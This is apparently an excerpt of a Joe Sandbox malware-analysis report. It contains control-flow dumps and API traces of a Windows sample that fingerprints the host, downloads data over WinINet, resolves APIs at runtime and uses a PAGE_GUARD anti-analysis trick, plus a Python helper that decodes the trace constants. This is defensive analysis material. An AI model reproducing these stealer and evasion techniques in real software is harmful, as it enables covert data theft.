15024->15029 15025->14949 15027 63a9b0 4 API calls 15027->15029 15028 63a8a0 lstrcpy 15028->15029 15029->15024 15029->15025 15029->15027 15029->15028 15032 631077 15030->15032 15031 631151 15031->13800 15032->15031 15033 63a820 lstrlen lstrcpy 15032->15033 15033->15032 15035 630db7 15034->15035 15036 630f17 15035->15036 15037 630e27 StrCmpCA 15035->15037 15038 630e67 StrCmpCA 15035->15038 15039 630ea4 StrCmpCA 15035->15039 15040 63a820 lstrlen lstrcpy 15035->15040 15036->13808 15037->15035 15038->15035 15039->15035 15040->15035 15045 630f67 15041->15045 15042 631044 15042->13816 15043 63a820 lstrlen lstrcpy 15043->15045 15044 630fb2 StrCmpCA 15044->15045 15045->15042 15045->15043 15045->15044 15047 63a740 lstrcpy 15046->15047 15048 631a26 15047->15048 15049 63a9b0 4 API calls 15048->15049 15050 631a37 15049->15050 15051 63a8a0 lstrcpy 15050->15051 15052 631a40 15051->15052 15053 63a9b0 4 API calls 15052->15053 15054 631a5b 15053->15054 15055 63a8a0 lstrcpy 15054->15055 15056 631a64 15055->15056 15057 63a9b0 4 API calls 15056->15057 15058 631a7d 15057->15058 15059 63a8a0 lstrcpy 15058->15059 15060 631a86 15059->15060 15061 63a9b0 4 API calls 15060->15061 15062 631aa1 15061->15062 15063 63a8a0 lstrcpy 15062->15063 15064 631aaa 15063->15064 15065 63a9b0 4 API calls 15064->15065 15066 631ac3 15065->15066 15067 63a8a0 lstrcpy 15066->15067 15068 631acc 15067->15068 15069 63a9b0 4 API calls 15068->15069 15070 631ae7 15069->15070 15071 63a8a0 lstrcpy 15070->15071 15072 631af0 15071->15072 15073 63a9b0 4 API calls 15072->15073 15074 631b09 15073->15074 15075 63a8a0 lstrcpy 15074->15075 15076 631b12 15075->15076 15077 63a9b0 4 API calls 15076->15077 15078 631b2d 15077->15078 15079 63a8a0 lstrcpy 15078->15079 15080 631b36 15079->15080 15081 63a9b0 4 API calls 15080->15081 15082 631b4f 15081->15082 15083 63a8a0 lstrcpy 15082->15083 15084 631b58 15083->15084 15085 63a9b0 4 API calls 15084->15085 15086 631b76 15085->15086 15087 63a8a0 lstrcpy 15086->15087 15088 631b7f 
15087->15088 15089 637500 6 API calls 15088->15089 15090 631b96 15089->15090 15091 63a920 3 API calls 15090->15091 15092 631ba9 15091->15092 15093 63a8a0 lstrcpy 15092->15093 15094 631bb2 15093->15094 15095 63a9b0 4 API calls 15094->15095 15096 631bdc 15095->15096 15097 63a8a0 lstrcpy 15096->15097 15098 631be5 15097->15098 15099 63a9b0 4 API calls 15098->15099 15100 631c05 15099->15100 15101 63a8a0 lstrcpy 15100->15101 15102 631c0e 15101->15102 15810 637690 GetProcessHeap RtlAllocateHeap 15102->15810 15105 63a9b0 4 API calls 15106 631c2e 15105->15106 15107 63a8a0 lstrcpy 15106->15107 15108 631c37 15107->15108 15109 63a9b0 4 API calls 15108->15109 15110 631c56 15109->15110 15111 63a8a0 lstrcpy 15110->15111 15112 631c5f 15111->15112 15113 63a9b0 4 API calls 15112->15113 15114 631c80 15113->15114 15115 63a8a0 lstrcpy 15114->15115 15116 631c89 15115->15116 15817 6377c0 GetCurrentProcess IsWow64Process 15116->15817 15119 63a9b0 4 API calls 15120 631ca9 15119->15120 15121 63a8a0 lstrcpy 15120->15121 15122 631cb2 15121->15122 15123 63a9b0 4 API calls 15122->15123 15124 631cd1 15123->15124 15125 63a8a0 lstrcpy 15124->15125 15126 631cda 15125->15126 15127 63a9b0 4 API calls 15126->15127 15128 631cfb 15127->15128 15129 63a8a0 lstrcpy 15128->15129 15130 631d04 15129->15130 15131 637850 3 API calls 15130->15131 15132 631d14 15131->15132 15133 63a9b0 4 API calls 15132->15133 15134 631d24 15133->15134 15135 63a8a0 lstrcpy 15134->15135 15136 631d2d 15135->15136 15137 63a9b0 4 API calls 15136->15137 15138 631d4c 15137->15138 15139 63a8a0 lstrcpy 15138->15139 15140 631d55 15139->15140 15141 63a9b0 4 API calls 15140->15141 15142 631d75 15141->15142 15143 63a8a0 lstrcpy 15142->15143 15144 631d7e 15143->15144 15145 6378e0 3 API calls 15144->15145 15146 631d8e 15145->15146 15147 63a9b0 4 API calls 15146->15147 15148 631d9e 15147->15148 15149 63a8a0 lstrcpy 15148->15149 15150 631da7 15149->15150 15151 63a9b0 4 API calls 15150->15151 15152 631dc6 15151->15152 15153 63a8a0 lstrcpy 
15152->15153 15154 631dcf 15153->15154 15155 63a9b0 4 API calls 15154->15155 15156 631df0 15155->15156 15157 63a8a0 lstrcpy 15156->15157 15158 631df9 15157->15158 15819 637980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15158->15819 15161 63a9b0 4 API calls 15162 631e19 15161->15162 15163 63a8a0 lstrcpy 15162->15163 15164 631e22 15163->15164 15165 63a9b0 4 API calls 15164->15165 15166 631e41 15165->15166 15167 63a8a0 lstrcpy 15166->15167 15168 631e4a 15167->15168 15169 63a9b0 4 API calls 15168->15169 15170 631e6b 15169->15170 15171 63a8a0 lstrcpy 15170->15171 15172 631e74 15171->15172 15821 637a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15172->15821 15175 63a9b0 4 API calls 15176 631e94 15175->15176 15177 63a8a0 lstrcpy 15176->15177 15178 631e9d 15177->15178 15179 63a9b0 4 API calls 15178->15179 15180 631ebc 15179->15180 15181 63a8a0 lstrcpy 15180->15181 15182 631ec5 15181->15182 15183 63a9b0 4 API calls 15182->15183 15184 631ee5 15183->15184 15185 63a8a0 lstrcpy 15184->15185 15186 631eee 15185->15186 15824 637b00 GetUserDefaultLocaleName 15186->15824 15189 63a9b0 4 API calls 15190 631f0e 15189->15190 15191 63a8a0 lstrcpy 15190->15191 15192 631f17 15191->15192 15193 63a9b0 4 API calls 15192->15193 15194 631f36 15193->15194 15195 63a8a0 lstrcpy 15194->15195 15196 631f3f 15195->15196 15197 63a9b0 4 API calls 15196->15197 15198 631f60 15197->15198 15199 63a8a0 lstrcpy 15198->15199 15200 631f69 15199->15200 15828 637b90 15200->15828 15202 631f80 15203 63a920 3 API calls 15202->15203 15204 631f93 15203->15204 15205 63a8a0 lstrcpy 15204->15205 15206 631f9c 15205->15206 15207 63a9b0 4 API calls 15206->15207 15208 631fc6 15207->15208 15209 63a8a0 lstrcpy 15208->15209 15210 631fcf 15209->15210 15211 63a9b0 4 API calls 15210->15211 15212 631fef 15211->15212 15213 63a8a0 lstrcpy 15212->15213 15214 631ff8 15213->15214 15840 637d80 GetSystemPowerStatus 15214->15840 15217 63a9b0 4 API calls 15218 632018 15217->15218 15219 63a8a0 lstrcpy 15218->15219 15220 
632021 15219->15220 15221 63a9b0 4 API calls 15220->15221 15222 632040 15221->15222 15223 63a8a0 lstrcpy 15222->15223 15224 632049 15223->15224 15225 63a9b0 4 API calls 15224->15225 15226 63206a 15225->15226 15227 63a8a0 lstrcpy 15226->15227 15228 632073 15227->15228 15229 63207e GetCurrentProcessId 15228->15229 15842 639470 OpenProcess 15229->15842 15232 63a920 3 API calls 15233 6320a4 15232->15233 15234 63a8a0 lstrcpy 15233->15234 15235 6320ad 15234->15235 15236 63a9b0 4 API calls 15235->15236 15237 6320d7 15236->15237 15238 63a8a0 lstrcpy 15237->15238 15239 6320e0 15238->15239 15240 63a9b0 4 API calls 15239->15240 15241 632100 15240->15241 15242 63a8a0 lstrcpy 15241->15242 15243 632109 15242->15243 15847 637e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15243->15847 15246 63a9b0 4 API calls 15247 632129 15246->15247 15248 63a8a0 lstrcpy 15247->15248 15249 632132 15248->15249 15250 63a9b0 4 API calls 15249->15250 15251 632151 15250->15251 15252 63a8a0 lstrcpy 15251->15252 15253 63215a 15252->15253 15254 63a9b0 4 API calls 15253->15254 15255 63217b 15254->15255 15256 63a8a0 lstrcpy 15255->15256 15257 632184 15256->15257 15851 637f60 15257->15851 15260 63a9b0 4 API calls 15261 6321a4 15260->15261 15262 63a8a0 lstrcpy 15261->15262 15263 6321ad 15262->15263 15264 63a9b0 4 API calls 15263->15264 15265 6321cc 15264->15265 15266 63a8a0 lstrcpy 15265->15266 15267 6321d5 15266->15267 15268 63a9b0 4 API calls 15267->15268 15269 6321f6 15268->15269 15270 63a8a0 lstrcpy 15269->15270 15271 6321ff 15270->15271 15864 637ed0 GetSystemInfo wsprintfA 15271->15864 15274 63a9b0 4 API calls 15275 63221f 15274->15275 15276 63a8a0 lstrcpy 15275->15276 15277 632228 15276->15277 15278 63a9b0 4 API calls 15277->15278 15279 632247 15278->15279 15280 63a8a0 lstrcpy 15279->15280 15281 632250 15280->15281 15282 63a9b0 4 API calls 15281->15282 15283 632270 15282->15283 15284 63a8a0 lstrcpy 15283->15284 15285 632279 15284->15285 15866 638100 GetProcessHeap RtlAllocateHeap 15285->15866 15288 
63a9b0 4 API calls 15289 632299 15288->15289 15290 63a8a0 lstrcpy 15289->15290 15291 6322a2 15290->15291 15292 63a9b0 4 API calls 15291->15292 15293 6322c1 15292->15293 15294 63a8a0 lstrcpy 15293->15294 15295 6322ca 15294->15295 15296 63a9b0 4 API calls 15295->15296 15297 6322eb 15296->15297 15298 63a8a0 lstrcpy 15297->15298 15299 6322f4 15298->15299 15872 6387c0 15299->15872 15302 63a920 3 API calls 15303 63231e 15302->15303 15304 63a8a0 lstrcpy 15303->15304 15305 632327 15304->15305 15306 63a9b0 4 API calls 15305->15306 15307 632351 15306->15307 15308 63a8a0 lstrcpy 15307->15308 15309 63235a 15308->15309 15310 63a9b0 4 API calls 15309->15310 15311 63237a 15310->15311 15312 63a8a0 lstrcpy 15311->15312 15313 632383 15312->15313 15314 63a9b0 4 API calls 15313->15314 15315 6323a2 15314->15315 15316 63a8a0 lstrcpy 15315->15316 15317 6323ab 15316->15317 15877 6381f0 15317->15877 15319 6323c2 15320 63a920 3 API calls 15319->15320 15321 6323d5 15320->15321 15322 63a8a0 lstrcpy 15321->15322 15323 6323de 15322->15323 15324 63a9b0 4 API calls 15323->15324 15325 63240a 15324->15325 15326 63a8a0 lstrcpy 15325->15326 15327 632413 15326->15327 15328 63a9b0 4 API calls 15327->15328 15329 632432 15328->15329 15330 63a8a0 lstrcpy 15329->15330 15331 63243b 15330->15331 15332 63a9b0 4 API calls 15331->15332 15333 63245c 15332->15333 15334 63a8a0 lstrcpy 15333->15334 15335 632465 15334->15335 15336 63a9b0 4 API calls 15335->15336 15337 632484 15336->15337 15338 63a8a0 lstrcpy 15337->15338 15339 63248d 15338->15339 15340 63a9b0 4 API calls 15339->15340 15341 6324ae 15340->15341 15342 63a8a0 lstrcpy 15341->15342 15343 6324b7 15342->15343 15885 638320 15343->15885 15345 6324d3 15346 63a920 3 API calls 15345->15346 15347 6324e6 15346->15347 15348 63a8a0 lstrcpy 15347->15348 15349 6324ef 15348->15349 15350 63a9b0 4 API calls 15349->15350 15351 632519 15350->15351 15352 63a8a0 lstrcpy 15351->15352 15353 632522 15352->15353 15354 63a9b0 4 API calls 15353->15354 15355 632543 15354->15355 
Control-flow graph (continued). The interactive node/edge rendering is not reproducible as text; the API calls visible in the graph nodes, grouped by routine address, are:
• 0x625000 region: InternetOpenUrlA, InternetReadFile, InternetCloseHandle
• 0x6247b0 region: lstrlen, InternetCrackUrlA
• 0x629af9 region: LocalAlloc, CryptStringToBinaryA, LocalFree
• 0x630759 region: StrCmpCA (three comparisons)
• 0x6376c6 and 0x637720: RegOpenKeyExA, RegQueryValueExA, RegCloseKey (0x637720 also GetProcessHeap, RtlAllocateHeap)
• 0x637a9a: wsprintfA; 0x638d20: LocalAlloc, CharToOemW
• 0x637bcc region: GetKeyboardLayoutList, LocalAlloc, GetLocaleInfoA, LocalFree
• 0x637fb9 region: GetLogicalProcessorInformationEx, GetLastError, GetProcessHeap, RtlAllocateHeap, HeapFree, wsprintfA
• 0x63814d region: GlobalMemoryStatusEx, __aulldiv, wsprintfA
• 0x6387fb: GetProcessHeap, RtlAllocateHeap, wsprintfA
• 0x63835c region: RegOpenKeyExA, RegEnumKeyExA, wsprintfA, RegQueryValueExA, lstrlen, RegCloseKey
• 0x6386bc region: CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
• 0x638b60 region: GetSystemTime
• 0x638ea0 region: CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap
• 0x639493: GetModuleFileNameExA, CloseHandle
• 0x625100 region: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetCloseHandle
• 0x626d40 / 0x626530 / 0x6269b0 region: VirtualAlloc, LoadLibraryA, GetProcAddress, VirtualFree, FreeLibrary
• string helpers 0x621590, 0x63a740, 0x63a7a0, 0x63a8a0, 0x63a920, 0x63a9b0: lstrcpy, lstrcat, lstrlen

Control-flow Graph
• Function 0x639860 (blocks 639860-639bc2): calls sub_639750 and sub_639780, then GetProcAddress 21 times against a single module handle, then LoadLibraryA 5 times, followed by conditional GetProcAddress calls against the newly loaded modules (blocks 639af4, 639b16, 639b4f, 639b71, 639b92). Of the names resolved, only NtQueryInformationProcess appears as readable text in the API listing below; the others are passed as pointers the sandbox did not resolve to strings.
                  APIs
                  • GetProcAddress.KERNEL32(75900000,01310EA0), ref: 006398A1
                  • GetProcAddress.KERNEL32(75900000,01310C30), ref: 006398BA
                  • GetProcAddress.KERNEL32(75900000,01310CD8), ref: 006398D2
                  • GetProcAddress.KERNEL32(75900000,01310BE8), ref: 006398EA
                  • GetProcAddress.KERNEL32(75900000,01310C00), ref: 00639903
                  • GetProcAddress.KERNEL32(75900000,013191E0), ref: 0063991B
                  • GetProcAddress.KERNEL32(75900000,01305540), ref: 00639933
                  • GetProcAddress.KERNEL32(75900000,013051A0), ref: 0063994C
                  • GetProcAddress.KERNEL32(75900000,01310C48), ref: 00639964
                  • GetProcAddress.KERNEL32(75900000,01310C60), ref: 0063997C
                  • GetProcAddress.KERNEL32(75900000,01310C78), ref: 00639995
                  • GetProcAddress.KERNEL32(75900000,01310D20), ref: 006399AD
                  • GetProcAddress.KERNEL32(75900000,01305520), ref: 006399C5
                  • GetProcAddress.KERNEL32(75900000,01310D38), ref: 006399DE
                  • GetProcAddress.KERNEL32(75900000,01310DB0), ref: 006399F6
                  • GetProcAddress.KERNEL32(75900000,01305280), ref: 00639A0E
                  • GetProcAddress.KERNEL32(75900000,01310DC8), ref: 00639A27
                  • GetProcAddress.KERNEL32(75900000,01310F60), ref: 00639A3F
                  • GetProcAddress.KERNEL32(75900000,01305220), ref: 00639A57
                  • GetProcAddress.KERNEL32(75900000,01310F78), ref: 00639A70
                  • GetProcAddress.KERNEL32(75900000,01305420), ref: 00639A88
                  • LoadLibraryA.KERNEL32(01310EE8,?,00636A00), ref: 00639A9A
                  • LoadLibraryA.KERNEL32(01310FA8,?,00636A00), ref: 00639AAB
                  • LoadLibraryA.KERNEL32(01310F00,?,00636A00), ref: 00639ABD
                  • LoadLibraryA.KERNEL32(01310F18,?,00636A00), ref: 00639ACF
                  • LoadLibraryA.KERNEL32(01310F30,?,00636A00), ref: 00639AE0
                  • GetProcAddress.KERNEL32(75070000,01310F48), ref: 00639B02
                  • GetProcAddress.KERNEL32(75FD0000,01310F90), ref: 00639B23
                  • GetProcAddress.KERNEL32(75FD0000,01319498), ref: 00639B3B
                  • GetProcAddress.KERNEL32(75A50000,01319438), ref: 00639B5D
                  • GetProcAddress.KERNEL32(74E50000,01305320), ref: 00639B7E
                  • GetProcAddress.KERNEL32(76E80000,013191F0), ref: 00639B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00639BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00639BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
• Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: cdf0fa955bbf08d9d065f7d2e6384a7e03519458f6e7aaa988a5ca4bafa3fbd1
                  • Instruction ID: 5ccbf5d7499e3581440f0a3bdb69f48e4522901213b186a5d4ac09adb45f198d
                  • Opcode Fuzzy Hash: cdf0fa955bbf08d9d065f7d2e6384a7e03519458f6e7aaa988a5ca4bafa3fbd1
                  • Instruction Fuzzy Hash: BCA182B55002409FC34CEFA8FE8896637FAF74C301706652AE646E3224DBF9A441DF62

Control-flow Graph
• Function 0x6245c0 (blocks 6245c0-6247a9): RtlAllocateHeap in the entry block 6245c0-624695, a loop over blocks 6246a0-6246a6 and 6246ac-62474a, then VirtualProtect in the exit block 62474f-6247a9. The VirtualProtect call listed below passes flNewProtect 0x100, which is PAGE_GUARD, for a 4-byte range.
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0062460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0062479C
                  Strings
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (one string, referenced from 30 sites), xrefs: 006245C7, 006245D2, 006245DD, 006245E8, 006245F3, 00624617, 00624622, 0062462D, 00624638, 00624643, 00624657, 00624662, 0062466D, 00624678, 00624683, 006246AC, 006246B7, 006246C2, 006246CD, 006246D8, 00624713, 0062471E, 00624729, 00624734, 0062473F, 0062474F, 0062475A, 00624765, 00624770, 0062477B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
• Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
• String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string, 30 times)
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 15a48d533cf3c0184e9b16a8f1afb26c07108c3c07171e58e4a6aac0e7501bcd
                  • Instruction ID: 78b7c5914ab6b88702b487ca41e8de4fb756a13d45544abbdeae20b8354245fe
                  • Opcode Fuzzy Hash: 15a48d533cf3c0184e9b16a8f1afb26c07108c3c07171e58e4a6aac0e7501bcd
                  • Instruction Fuzzy Hash: 0A41DA607C2A08EFA7A8FBE4984EE9D77779F4EB24F516044AE2257283CBB05500C536

                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                    • Part of subcall function 006247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • InternetOpenA.WININET(00640DFE,00000001,00000000,00000000,00000000), ref: 006262E1
                  • StrCmpCA.SHLWAPI(?,0131F730), ref: 00626303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0131F490,00000000,00000000,00400100,00000000), ref: 00626385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006263BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006263D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006263FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0062646D
                  • InternetCloseHandle.WININET(00000000), ref: 006264EF
                  • InternetCloseHandle.WININET(00000000), ref: 006264F9
                  • InternetCloseHandle.WININET(00000000), ref: 00626503
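The two API listings above, the LoadLibraryA/GetProcAddress resolver at 0x639860 and the WinINet download routine just listed (InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile), print every argument as a raw number. The Python helper below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses API lines in the report's own format, names the WinINet constants that matter for triage (access type, service, request flags, option code, query level, read chunk size), and summarises how many names the resolver fetches per module handle. Constant names and values are the public wininet.h definitions; the sample lines are copied from the listings above (the resolver lines are a subset).

```python
"""Decode the raw numeric arguments in the Joe Sandbox API listings above.
Added example, not part of the report or of the analysed sample; constant
names and values are the public definitions from wininet.h."""
import re
from collections import Counter

# wininet.h constants needed to read this trace (subset).
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID", 0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}

# api -> {argument index: (argument name, kind, lookup table)}
DECODERS = {
    "InternetOpenA":      {1: ("dwAccessType", "enum", INTERNET_OPEN_TYPE)},
    "InternetConnectA":   {5: ("dwService", "enum", INTERNET_SERVICE)},
    "HttpOpenRequestA":   {6: ("dwFlags", "flags", INTERNET_FLAGS)},
    "InternetSetOptionA": {1: ("dwOption", "enum", INTERNET_OPTION)},
    "HttpQueryInfoA":     {1: ("dwInfoLevel", "enum", HTTP_QUERY)},
    "InternetReadFile":   {2: ("dwNumberOfBytesToRead", "int", None)},
}

# One report line looks like: "• Api.MODULE(arg,arg,...), ref: 00626385"
LINE_RE = re.compile(r"^\W*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_api_line(line):
    """Split one API line into name, module, argument strings and call site, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")}


def as_int(arg):
    """Report arguments are 8-digit hex; '?' (not captured) and literals such as GET are not."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None


def decode_flags(value, table):
    """Name every set bit listed in table; bits not in the table are reported as unknown."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([f"0x{rest:08X} (unknown)"] if rest else [])


def decode_call(call):
    """Return {argument name: decoded value} for the constants this API carries."""
    out = {}
    for idx, (name, kind, table) in DECODERS.get(call["api"], {}).items():
        if idx >= len(call["args"]):
            continue
        value = as_int(call["args"][idx])
        if value is None:
            out[name] = call["args"][idx]      # '?' means the sandbox did not record it
        elif kind == "enum":
            out[name] = table.get(value, f"0x{value:X} (unknown)")
        elif kind == "flags":
            out[name] = decode_flags(value, table)
        else:
            out[name] = value
    return out


def decode_trace(lines):
    """Parse and decode every API line in the given report excerpt, in order."""
    calls = [c for c in map(parse_api_line, lines) if c]
    for call in calls:
        call["decoded"] = decode_call(call)
    return calls


def resolution_summary(calls):
    """For a LoadLibraryA/GetProcAddress listing: names resolved per module handle, number of
    LoadLibraryA calls, and how many resolved names the report shows only as a pointer."""
    gpa = [c for c in calls if c["api"] == "GetProcAddress"]
    out = dict(Counter(c["args"][0] for c in gpa))
    out["LoadLibraryA"] = sum(c["api"] == "LoadLibraryA" for c in calls)
    out["names_as_pointer"] = sum(as_int(c["args"][1]) is not None for c in gpa)
    return out


# Lines copied from the report's API listings above (the resolver lines are a subset).
HTTP_LINES = """\
• InternetOpenA.WININET(00640DFE,00000001,00000000,00000000,00000000), ref: 006262E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626335
• HttpOpenRequestA.WININET(00000000,GET,?,0131F490,00000000,00000000,00400100,00000000), ref: 00626385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006263BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006263D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006263FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0062646D
""".splitlines()
RESOLVER_LINES = """\
• GetProcAddress.KERNEL32(75900000,01310EA0), ref: 006398A1
• GetProcAddress.KERNEL32(75900000,01310C30), ref: 006398BA
• LoadLibraryA.KERNEL32(01310EE8,?,00636A00), ref: 00639A9A
• GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00639BB6
""".splitlines()
```

Running `decode_trace(HTTP_LINES)` shows the request is opened with INTERNET_OPEN_TYPE_DIRECT, connected with INTERNET_SERVICE_HTTP, built as a GET with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, the option set just before HttpSendRequestA is INTERNET_OPTION_SECURITY_FLAGS (its value is shown as `?`, so the trace does not tell you which certificate checks, if any, are disabled), the response header queried is HTTP_QUERY_STATUS_CODE, and the body is read in 1999-byte chunks. `resolution_summary(decode_trace(RESOLVER_LINES))` returns `{"75900000": 2, "76E80000": 1, "LoadLibraryA": 1, "names_as_pointer": 2}` for the four-line subset.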
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
• Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
